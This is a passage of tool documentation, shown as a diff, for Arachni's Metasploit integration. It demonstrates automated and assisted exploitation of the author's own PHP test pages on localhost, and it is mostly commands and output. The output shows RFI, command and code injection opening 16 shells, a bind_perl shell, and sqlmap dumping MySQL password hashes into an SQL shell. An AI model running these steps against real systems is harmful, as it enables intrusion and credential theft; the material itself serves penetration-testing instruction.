specific DBMS tables/columns, run his own SQL SELECT
|
142
|
+
statement, read specific files on the file system and much
|
143
|
+
more.
|
144
|
+
|
145
|
+
|
146
|
+
|
147
|
+
|
148
|
+
Vulnerabilities
|
149
|
+
===============
|
150
|
+
|
151
|
+
ID Host Path Name Method Params Exploit
|
152
|
+
-- ---- ---- ---- ------ ------ -------
|
153
|
+
1 127.0.0.1 /~zapotek/tests/trainer.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
|
154
|
+
2 127.0.0.1 /~zapotek/tests/trainer.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
|
155
|
+
3 127.0.0.1 /~zapotek/tests/cookies/os_command.php OS command injection COOKIE {"os_command"=>"XXinjectionXX\x00"} unix/webapp/arachni_exec
|
156
|
+
4 127.0.0.1 /~zapotek/tests/cookies/os_command.php OS command injection COOKIE {"os_command"=>"XXinjectionXX"} unix/webapp/arachni_exec
|
157
|
+
5 127.0.0.1 /~zapotek/tests/cookies/rfi.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
|
158
|
+
6 127.0.0.1 /~zapotek/tests/cookies/rfi.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
|
159
|
+
7 127.0.0.1 /~zapotek/tests/cookies/eval.php Code injection COOKIE {"eval"=>"%3BXXinjectionXX"} unix/webapp/arachni_php_eval
|
160
|
+
8 127.0.0.1 /~zapotek/tests/forms/eval.php Code injection POST {"eval"=>";XXinjectionXX"} unix/webapp/arachni_php_eval
|
161
|
+
9 127.0.0.1 /~zapotek/tests/forms/os_command.php OS command injection POST {"os_command"=>"XXinjectionXX\x00"} unix/webapp/arachni_exec
|
162
|
+
10 127.0.0.1 /~zapotek/tests/forms/os_command.php OS command injection POST {"os_command"=>"XXinjectionXX"} unix/webapp/arachni_exec
|
163
|
+
11 127.0.0.1 /~zapotek/tests/forms/rfi.php Remote file inclusion POST {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
|
164
|
+
12 127.0.0.1 /~zapotek/tests/forms/rfi.php Remote file inclusion POST {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
|
165
|
+
13 127.0.0.1 /~zapotek/tests/forms/sqli.php SQL Injection POST {"sql_inj"=>"1"} unix/webapp/arachni_sqlmap
|
166
|
+
14 127.0.0.1 /~zapotek/tests/links/os_command.php OS command injection GET {"os_command"=>"XXinjectionXX\x00"} unix/webapp/arachni_exec
|
167
|
+
15 127.0.0.1 /~zapotek/tests/links/os_command.php OS command injection GET {"os_command"=>"XXinjectionXX"} unix/webapp/arachni_exec
|
168
|
+
16 127.0.0.1 /~zapotek/tests/links/rfi.php Remote file inclusion GET {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
|
169
|
+
17 127.0.0.1 /~zapotek/tests/links/rfi.php Remote file inclusion GET {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
|
170
|
+
18 127.0.0.1 /~zapotek/tests/links/eval.php Code injection GET {"eval"=>";XXinjectionXX"} unix/webapp/arachni_php_eval
|
171
|
+
19 127.0.0.1 /~zapotek/tests/links/sqli.php Blind SQL Injection GET {"id"=>"1"} unix/webapp/arachni_sqlmap
|
172
|
+
|
173
|
+
|
174
|
+
|
175
|
+
[*] Done!
|
176
|
+
msf >
|
177
|
+
|
178
|
+
#### Automated exploitation (arachni_autopwn)
|
179
|
+
|
180
|
+
##### Usage
|
181
|
+
msf > arachni_autopwn
|
182
|
+
[*] Usage: arachni_autopwn [options]
|
183
|
+
-h Display this help text
|
184
|
+
-x [regexp] Only run modules whose name matches the regex
|
185
|
+
-a Launch exploits against all matched targets
|
186
|
+
-r Use a reverse connect shell
|
187
|
+
-b Use a bind shell on a random port (default)
|
188
|
+
-m Use a meterpreter shell (if possible)
|
189
|
+
-q Disable exploit module output
|
190
|
+
|
191
|
+
##### Example
|
192
|
+
msf > arachni_autopwn -a
|
193
|
+
[*] Running pwn-jobs...
|
194
|
+
[...snip...]
|
195
|
+
[*] Command shell session 1 opened (127.0.0.1:54598 -> 127.0.0.1:5019) at 2010-10-28 18:26:00 +0100
|
196
|
+
[*] Command shell session 2 opened (127.0.0.1:55336 -> 127.0.0.1:8541) at 2010-10-28 18:26:00 +0100
|
197
|
+
[*] Command shell session 3 opened (127.0.0.1:37880 -> 127.0.0.1:12465) at 2010-10-28 18:26:00 +0100
|
198
|
+
[*] Command shell session 4 opened (127.0.0.1:49451 -> 127.0.0.1:10866) at 2010-10-28 18:26:00 +0100
|
199
|
+
[*] Command shell session 5 opened (127.0.0.1:40276 -> 127.0.0.1:11915) at 2010-10-28 18:26:00 +0100
|
200
|
+
[*] Command shell session 6 opened (127.0.0.1:34400 -> 127.0.0.1:5222) at 2010-10-28 18:26:00 +0100
|
201
|
+
[*] Command shell session 7 opened (127.0.0.1:58456 -> 127.0.0.1:10955) at 2010-10-28 18:26:00 +0100
|
202
|
+
[*] Command shell session 9 opened (127.0.0.1:48549 -> 127.0.0.1:5929) at 2010-10-28 18:26:00 +0100
|
203
|
+
[*] Command shell session 8 opened (127.0.0.1:47028 -> 127.0.0.1:12432) at 2010-10-28 18:26:00 +0100
|
204
|
+
[*] Command shell session 10 opened (127.0.0.1:38239 -> 127.0.0.1:11919) at 2010-10-28 18:26:00 +0100
|
205
|
+
[*] Command shell session 11 opened (127.0.0.1:58541 -> 127.0.0.1:14343) at 2010-10-28 18:26:01 +0100
|
206
|
+
[*] Command shell session 12 opened (127.0.0.1:48655 -> 127.0.0.1:13743) at 2010-10-28 18:26:01 +0100
|
207
|
+
[*] Command shell session 13 opened (127.0.0.1:59996 -> 127.0.0.1:8895) at 2010-10-28 18:26:01 +0100
|
208
|
+
[*] Command shell session 14 opened (127.0.0.1:53717 -> 127.0.0.1:10767) at 2010-10-28 18:26:01 +0100
|
209
|
+
[*] Command shell session 15 opened (127.0.0.1:51623 -> 127.0.0.1:7668) at 2010-10-28 18:26:01 +0100
|
210
|
+
[*] Command shell session 16 opened (127.0.0.1:47874 -> 127.0.0.1:8965) at 2010-10-28 18:26:02 +0100
|
211
|
+
[...snip...]
|
212
|
+
[*] The autopwn command has completed with 16 sessions
|
213
|
+
[*] Enter sessions -i [ID] to interact with a given session ID
|
214
|
+
[*]
|
215
|
+
[*] ================================================================================
|
216
|
+
|
217
|
+
Active sessions
|
218
|
+
===============
|
219
|
+
|
220
|
+
Id Type Information Connection Via
|
221
|
+
-- ---- ----------- ---------- ---
|
222
|
+
1 shell 127.0.0.1:54598 -> 127.0.0.1:5019 exploit/unix/webapp/arachni_php_eval
|
223
|
+
2 shell 127.0.0.1:55336 -> 127.0.0.1:8541 exploit/unix/webapp/arachni_exec
|
224
|
+
3 shell 127.0.0.1:37880 -> 127.0.0.1:12465 exploit/unix/webapp/arachni_exec
|
225
|
+
4 shell 127.0.0.1:49451 -> 127.0.0.1:10866 exploit/unix/webapp/arachni_php_include
|
226
|
+
5 shell 127.0.0.1:40276 -> 127.0.0.1:11915 exploit/unix/webapp/arachni_php_eval
|
227
|
+
6 shell 127.0.0.1:34400 -> 127.0.0.1:5222 exploit/unix/webapp/arachni_exec
|
228
|
+
7 shell 127.0.0.1:58456 -> 127.0.0.1:10955 exploit/unix/webapp/arachni_php_include
|
229
|
+
8 shell 127.0.0.1:47028 -> 127.0.0.1:12432 exploit/unix/webapp/arachni_exec
|
230
|
+
9 shell 127.0.0.1:48549 -> 127.0.0.1:5929 exploit/unix/webapp/arachni_exec
|
231
|
+
10 shell 127.0.0.1:38239 -> 127.0.0.1:11919 exploit/unix/webapp/arachni_exec
|
232
|
+
11 shell 127.0.0.1:58541 -> 127.0.0.1:14343 exploit/unix/webapp/arachni_php_include
|
233
|
+
12 shell 127.0.0.1:48655 -> 127.0.0.1:13743 exploit/unix/webapp/arachni_php_include
|
234
|
+
13 shell 127.0.0.1:59996 -> 127.0.0.1:8895 exploit/unix/webapp/arachni_php_include
|
235
|
+
14 shell 127.0.0.1:53717 -> 127.0.0.1:10767 exploit/unix/webapp/arachni_php_include
|
236
|
+
15 shell 127.0.0.1:51623 -> 127.0.0.1:7668 exploit/unix/webapp/arachni_php_eval
|
237
|
+
16 shell 127.0.0.1:47874 -> 127.0.0.1:8965 exploit/unix/webapp/arachni_php_include
|
238
|
+
|
239
|
+
[*] ================================================================================
|
240
|
+
msf > sessions -i 1
|
241
|
+
[*] Starting interaction with 1...
|
242
|
+
|
243
|
+
ls
|
244
|
+
eval.php
|
245
|
+
os_command.php
|
246
|
+
rfi.php
|
247
|
+
sqli.php
|
248
|
+
xss.php
|
249
|
+
|
250
|
+
whoami
|
251
|
+
www-data
|
252
|
+
^C
|
253
|
+
Abort session 1? [y/N] y
|
254
|
+
|
255
|
+
[*] Command shell session 1 closed. Reason: User exit
|
256
|
+
msf >
|
257
|
+
|
258
|
+
Notice that we ended up with 16 sessions out of the 19 reported vulnerabilities. <br/>
|
259
|
+
This is due to the fact that the "unix/webapp/arachni_sqlmap" exploit can't be launched automatically and because some of the reported vulnerabilities are basically the same.
|
260
|
+
|
261
|
+
Next we'll see how to use the "arachni_manual" command for assisted exploitation and get an SQL shell.
|
262
|
+
|
263
|
+
### Assisted exploitation (arachni_manual)
|
264
|
+
msf > arachni_list_vulns # Let's take a look at the available vulnerabilities once again.
|
265
|
+
|
266
|
+
Vulnerabilities
|
267
|
+
===============
|
268
|
+
|
269
|
+
ID Host Path Name Method Params Exploit
|
270
|
+
-- ---- ---- ---- ------ ------ -------
|
271
|
+
1 127.0.0.1 /~zapotek/tests/trainer.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
|
272
|
+
2 127.0.0.1 /~zapotek/tests/trainer.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
|
273
|
+
3 127.0.0.1 /~zapotek/tests/cookies/os_command.php OS command injection COOKIE {"os_command"=>"XXinjectionXX\x00"} unix/webapp/arachni_exec
|
274
|
+
4 127.0.0.1 /~zapotek/tests/cookies/os_command.php OS command injection COOKIE {"os_command"=>"XXinjectionXX"} unix/webapp/arachni_exec
|
275
|
+
5 127.0.0.1 /~zapotek/tests/cookies/rfi.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
|
276
|
+
6 127.0.0.1 /~zapotek/tests/cookies/rfi.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
|
277
|
+
7 127.0.0.1 /~zapotek/tests/cookies/eval.php Code injection COOKIE {"eval"=>"%3BXXinjectionXX"} unix/webapp/arachni_php_eval
|
278
|
+
8 127.0.0.1 /~zapotek/tests/forms/eval.php Code injection POST {"eval"=>";XXinjectionXX"} unix/webapp/arachni_php_eval
|
279
|
+
9 127.0.0.1 /~zapotek/tests/forms/os_command.php OS command injection POST {"os_command"=>"XXinjectionXX\x00"} unix/webapp/arachni_exec
|
280
|
+
10 127.0.0.1 /~zapotek/tests/forms/os_command.php OS command injection POST {"os_command"=>"XXinjectionXX"} unix/webapp/arachni_exec
|
281
|
+
11 127.0.0.1 /~zapotek/tests/forms/rfi.php Remote file inclusion POST {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
|
282
|
+
12 127.0.0.1 /~zapotek/tests/forms/rfi.php Remote file inclusion POST {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
|
283
|
+
13 127.0.0.1 /~zapotek/tests/forms/sqli.php SQL Injection POST {"sql_inj"=>"1"} unix/webapp/arachni_sqlmap
|
284
|
+
14 127.0.0.1 /~zapotek/tests/links/os_command.php OS command injection GET {"os_command"=>"XXinjectionXX\x00"} unix/webapp/arachni_exec
|
285
|
+
15 127.0.0.1 /~zapotek/tests/links/os_command.php OS command injection GET {"os_command"=>"XXinjectionXX"} unix/webapp/arachni_exec
|
286
|
+
16 127.0.0.1 /~zapotek/tests/links/rfi.php Remote file inclusion GET {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
|
287
|
+
17 127.0.0.1 /~zapotek/tests/links/rfi.php Remote file inclusion GET {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
|
288
|
+
18 127.0.0.1 /~zapotek/tests/links/eval.php Code injection GET {"eval"=>";XXinjectionXX"} unix/webapp/arachni_php_eval
|
289
|
+
19 127.0.0.1 /~zapotek/tests/links/sqli.php Blind SQL Injection GET {"id"=>"1"} unix/webapp/arachni_sqlmap
|
290
|
+
|
291
|
+
|
292
|
+
msf > arachni_manual 19 # The vulnerability with ID '19' uses the 'unix/webapp/arachni_sqlmap' module
|
293
|
+
[*] Using unix/webapp/arachni_sqlmap .
|
294
|
+
[*] Preparing datastore for 'Blind SQL Injection' vulnerability @ 127.0.0.1/~zapotek/tests/links/sqli.php ...
|
295
|
+
SRVHOST => 127.0.0.1
|
296
|
+
SRVPORT => 7872
|
297
|
+
RHOST => 127.0.0.1
|
298
|
+
RPORT => 80
|
299
|
+
LHOST => 127.0.0.1
|
300
|
+
LPORT => 12633
|
301
|
+
SSL => false
|
302
|
+
GET => id=1
|
303
|
+
METHOD => GET
|
304
|
+
COOKIES =>
|
305
|
+
HEADERS => Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/0.2.1
|
306
|
+
PATH => /~zapotek/tests/links/sqli.php
|
307
|
+
[*] Done!
|
308
|
+
|
309
|
+
Compatible payloads
|
310
|
+
===================
|
311
|
+
|
312
|
+
Name Description
|
313
|
+
---- -----------
|
314
|
+
|
315
|
+
|
316
|
+
Use: set PAYLOAD <name>
|
317
|
+
msf auxiliary(arachni_sqlmap) > show options # Make sure that everything is setup properly
|
318
|
+
|
319
|
+
Module options:
|
320
|
+
|
321
|
+
Name Current Setting Required Description
|
322
|
+
---- --------------- -------- -----------
|
323
|
+
COOKIES no
|
324
|
+
GET id=1 no HTTP GET query
|
325
|
+
METHOD GET yes HTTP Method
|
326
|
+
OPTS --users --time-test --passwords --dbs --sql-shell -v 0 no The sqlmap options to use
|
327
|
+
PATH /~zapotek/tests/links/sqli.php yes The path to test for SQL injection
|
328
|
+
POST no The data string to be sent through POST
|
329
|
+
Proxies no Use a proxy chain
|
330
|
+
RHOST 127.0.0.1 yes The target address
|
331
|
+
RPORT 80 yes The target port
|
332
|
+
SQLMAP_PATH sqlmap yes The sqlmap >= 0.8 full path
|
333
|
+
VHOST no HTTP server virtual host
|
334
|
+
|
335
|
+
msf auxiliary(arachni_sqlmap) > set SQLMAP_PATH /home/zapotek/Downloads/sqlmap/sqlmap.py # Tell the module where the sqlmap script is
|
336
|
+
SQLMAP_PATH => /home/zapotek/Downloads/sqlmap/sqlmap.py
|
337
|
+
msf auxiliary(arachni_sqlmap) > exploit # rock it!
|
338
|
+
|
339
|
+
[*] exec: /home/zapotek/Downloads/sqlmap/sqlmap.py -u 'http://127.0.0.1:80//~zapotek/tests/links/sqli.php?id=1' --method GET --users --time-test --passwords --dbs --sql-shell -v 0 --cookie ''
|
340
|
+
|
341
|
+
sqlmap/0.8 - automatic SQL injection and database takeover tool
|
342
|
+
http://sqlmap.sourceforge.net
|
343
|
+
|
344
|
+
[*] starting at: 15:08:25
|
345
|
+
|
346
|
+
[15:08:26] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
|
347
|
+
web server operating system: Linux Ubuntu
|
348
|
+
web application technology: PHP 5.3.3, Apache 2.2.16
|
349
|
+
back-end DBMS: MySQL >= 5.0.0
|
350
|
+
|
351
|
+
time based blind sql injection payload: 'id=1%27%20AND%20SLEEP%285%29%20AND%20%27HXME%27=%27HXME'
|
352
|
+
|
353
|
+
database management system users [5]:
|
354
|
+
[*] 'debian-sys-maint'@'localhost'
|
355
|
+
[*] 'phpmyadmin'@'localhost'
|
356
|
+
[*] 'root'@'127.0.0.1'
|
357
|
+
[*] 'root'@'localhost'
|
358
|
+
[*] 'root'@'zonster'
|
359
|
+
|
360
|
+
database management system users password hashes:
|
361
|
+
[*] debian-sys-maint [1]:
|
362
|
+
password hash: *7AD474111CBF8492D9311D6E8493490ED6247D86
|
363
|
+
[*] phpmyadmin [1]:
|
364
|
+
password hash: *C3A70F18627A18967A3A70C0F648CDEE0BCE9AB2
|
365
|
+
[*] root [1]:
|
366
|
+
password hash: NULL
|
367
|
+
|
368
|
+
available databases [5]:
|
369
|
+
[*] arachni
|
370
|
+
[*] information_schema
|
371
|
+
[*] msf
|
372
|
+
[*] mysql
|
373
|
+
[*] phpmyadmin
|
374
|
+
|
375
|
+
sql-shell> CURRENT_USER() # And we now have an SQL shell to play with!
|
376
|
+
do you want to retrieve the SQL statement output? [Y/n]
|
377
|
+
CURRENT_USER(): 'root@localhost'
|
378
|
+
sql-shell> VERSION()
|
379
|
+
do you want to retrieve the SQL statement output? [Y/n]
|
380
|
+
VERSION(): '5.1.49-1ubuntu8'
|
381
|
+
|
382
|
+
sql-shell> q
|
383
|
+
|
384
|
+
[*] shutting down at: 15:09:07
|
385
|
+
|
386
|
+
[*] Auxiliary module execution completed
|
387
|
+
msf auxiliary(arachni_sqlmap) >
|
388
|
+
|
389
|
+
Of course 'arachni_manual' is not limited to any one module.
|
390
|
+
For example:
|
391
|
+
msf auxiliary(arachni_sqlmap) > arachni_manual 15 # Prepare the vulnerability with ID '15'
|
392
|
+
[*] Using unix/webapp/arachni_exec .
|
393
|
+
[*] Preparing datastore for 'OS command injection' vulnerability @ 127.0.0.1/~zapotek/tests/links/os_command.php ...
|
394
|
+
SRVHOST => 127.0.0.1
|
395
|
+
SRVPORT => 9033
|
396
|
+
RHOST => 127.0.0.1
|
397
|
+
RPORT => 80
|
398
|
+
LHOST => 127.0.0.1
|
399
|
+
LPORT => 11853
|
400
|
+
SSL => false
|
401
|
+
GET => os_command=XXinjectionXX
|
402
|
+
METHOD => GET
|
403
|
+
COOKIES =>
|
404
|
+
HEADERS => Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/0.2.1
|
405
|
+
PATH => /~zapotek/tests/links/os_command.php
|
406
|
+
[*] Done!
|
407
|
+
PAYLOAD => cmd/unix/bind_perl
|
408
|
+
msf exploit(arachni_exec) > exploit # rock it!
|
409
|
+
|
410
|
+
[*] Sending HTTP request for /~zapotek/tests/links/os_command.php
|
411
|
+
[*] Started bind handler
|
412
|
+
[*] Command shell session 17 opened (127.0.0.1:45295 -> 127.0.0.1:11853) at 2010-10-29 15:13:48 +0100 # And we now have a system shell!
|
413
|
+
|
414
|
+
ls
|
415
|
+
eval.php
|
416
|
+
os_command.php
|
417
|
+
redirect.php
|
418
|
+
rfi.php
|
419
|
+
sqli.php
|
420
|
+
xss.php
|
421
|
+
|
422
|
+
whoami
|
423
|
+
www-data
|
424
|
+
^C
|
425
|
+
Abort session 17? [y/N] y
|
426
|
+
|
427
|
+
[*] Command shell session 17 closed. Reason: User exit
|
428
|
+
msf exploit(arachni_exec) >
|
429
|
+
|